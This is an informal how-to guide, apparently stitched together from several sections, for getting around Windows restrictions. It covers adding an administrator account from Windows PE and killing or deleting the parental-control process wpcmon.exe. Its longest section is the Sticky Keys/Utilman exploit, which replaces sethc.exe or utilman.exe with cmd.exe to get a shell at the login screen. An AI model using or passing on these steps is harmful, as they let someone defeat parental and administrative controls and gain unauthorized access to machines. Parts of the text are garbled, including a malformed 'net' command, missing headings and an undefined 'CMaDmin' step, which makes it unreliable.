1: Create a new .bat file. This can be done by changing the file extension or using "Save As".
2: Add contents to it.

Create a new administrator account, bypassing restrictions.
1: Access an admin Command Prompt/Powershell prompt. You can access an elevated Command Prompt/Powershell instance (more permissions than admin) by booting into Windows PE, selecting "Advanced Options", then "Command Prompt". You can also use a Windows 10 Media Installation USB & select Next>Repair Your Computer>Troubleshoot>Command Prompt.
2: Create a new user by running these commands: "net {username} /add" & "net localgroup administrators {username} /add".
3: Login with the username & password you made. This account has administrator access.

End the task of (or just delete) the file.
1: Open Task Manager. You can use the search box or Ctrl+Alt+Delete.
2: Find the file responsible. If you're bypassing parental controls, the file will be "wpcmon.exe".
3: Right click it, then you can either click "End Task" to stop it for now or click "Open File Location" & then delete the file itself.

1: Open Windows Powershell & run “cd (exelocation)”.
2: Run “copy .\filename C:\Windows\Temp\exefilename”.
3: Run “C:\Windows\Temp\exefilename”.

Swaps a file (commonly Sticky Keys or Ease of Access Manager) with any file you want.
Also known as either the Sticky Keys or Utilman exploit.

1: Access an elevated Command Prompt/Powershell instance. You can do this by booting into Windows PE, selecting "Advanced Options", then "Command Prompt", or by using a Windows installation media on an external storage device & selecting Next > Repair Your Computer > Troubleshoot > Command Prompt.
2: Run “C:”. Note that Windows can be installed on any drive, C is just the most common one.
3: Run “dir”. Keep going until you find a drive with the Windows directory (1).
4: Create a backup by runinng “copy sethc.exe sethc.bak” for Sticky Keys or "copy utilman.exe utilman.bak" for Utilman.
5: Swap the respective file with another file. In order to replace Sticky Keys/Utilman with another file, change the former's filename. For Command Prompt, run “copy cmd.exe sethc.exe” for Sticky Keys or "copy cmd.exe utilman.exe" for Utilman.
6: Type "Y" to proceed.
7: Activate Sticky Keys (press Shift 5 times) or click the Ease of Access button (on the login screen as well as Ctrl+Alt+Delete).
8: Preform CMaDmin.

Manually swap either Sticky Keys or Utilman with any file you want.
1: Open File Explorer.
2: Find the file you want to replace (sethc.exe for Sticky Keys or utilman.exe for Utilman).
3: Make a duplicate & change the file type to .bak (or whatever really).
4: Replace the original file with another file (make sure it has the same name). I recommend either cmd.exe or the Ease of Access Replacer.
5: Activate Sticky Keys (press Shift 5 times) or click the Ease of Access button (on login screen as well as Ctrl+Alt+Delete).
6: Preform CMaDmin.
